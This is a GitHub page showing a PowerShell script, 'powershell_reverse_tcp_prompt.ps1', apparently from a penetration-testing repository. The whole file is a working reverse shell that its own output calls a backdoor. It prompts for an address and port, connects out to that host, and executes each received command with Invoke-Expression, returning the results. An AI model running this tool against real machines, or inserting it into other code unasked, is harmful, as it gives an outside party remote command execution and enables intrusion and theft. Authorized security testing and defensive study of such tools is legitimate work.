-
Notifications
You must be signed in to change notification settings - Fork 65
/
powershell_reverse_tcp_prompt.ps1
75 lines (75 loc) · 2.03 KB
/
powershell_reverse_tcp_prompt.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
$addr = $(Read-Host -Prompt "Enter address").Trim();
Write-Host "";
$port = $(Read-Host -Prompt "Enter port number").Trim();
Write-Host "";
if ($addr.Length -lt 1 -or $port.Length -lt 1) {
Write-Host "Both parameters are required";
} else {
Write-Host "PowerShell Reverse TCP v4.0 by Ivan Sincek.";
Write-Host "GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.";
$client = $stream = $buffer = $writer = $data = $result = $null;
try {
$client = New-Object Net.Sockets.TcpClient($addr, $port);
$stream = $client.GetStream();
$buffer = New-Object Byte[] 1024;
$encoding = New-Object Text.UTF8Encoding;
$writer = New-Object IO.StreamWriter($stream, [Text.Encoding]::UTF8, 1024);
$writer.AutoFlush = $true;
Write-Host "Backdoor is up and running...";
Write-Host "";
$bytes = 0;
do {
$writer.Write("PS>");
do {
$bytes = $stream.Read($buffer, 0, $buffer.Length); # blocking
if ($bytes -gt 0) {
$data += $encoding.GetString($buffer, 0, $bytes);
}
} while ($stream.DataAvailable);
if ($bytes -gt 0) {
$data = $data.Trim();
if ($data.Length -gt 0) {
try {
$result = Invoke-Expression -Command $data 2>&1 | Out-String;
} catch {
$result = $_.Exception | Out-String;
}
Clear-Variable data;
if ($result.Length -gt 0) {
$writer.Write($result);
Clear-Variable result;
}
}
}
} while ($bytes -gt 0);
Write-Host "Backdoor will now exit...";
} catch {
Write-Host $_.Exception.InnerException.Message;
} finally {
if ($writer -ne $null) {
$writer.Close(); $writer.Dispose();
Clear-Variable writer;
}
if ($stream -ne $null) {
$stream.Close(); $stream.Dispose();
Clear-Variable stream;
}
if ($client -ne $null) {
$client.Close(); $client.Dispose();
Clear-Variable client;
}
if ($buffer -ne $null) {
$buffer.Clear();
Clear-Variable buffer;
}
if ($result -ne $null) {
Clear-Variable result;
}
if ($data -ne $null) {
Clear-Variable data;
}
[GC]::Collect();
}
}
Clear-Variable addr;
Clear-Variable port;